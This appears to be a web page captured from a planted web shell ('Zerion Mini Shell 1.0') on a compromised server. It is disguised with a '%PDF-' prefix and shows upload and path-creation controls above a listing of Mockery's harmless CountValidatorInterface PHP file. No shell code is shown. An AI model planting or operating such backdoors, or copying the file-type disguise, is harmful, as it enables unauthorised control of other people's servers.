%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/loslex/demo/vendor/mockery/mockery/library/Mockery/CountValidator/
Upload File :
Create Path :
Current File : //www/loslex/demo/vendor/mockery/mockery/library/Mockery/CountValidator/CountValidatorInterface.php

<?php

namespace Mockery\CountValidator;

interface CountValidatorInterface
{
    /**
     * Checks if the validator can accept an additional nth call
     *
     * @param int $n
     *
     * @return bool
     */
    public function isEligible($n);

    /**
     * Validate the call count against this validator
     *
     * @param int $n
     *
     * @return bool
     */
    public function validate($n);
}

Zerion Mini Shell 1.0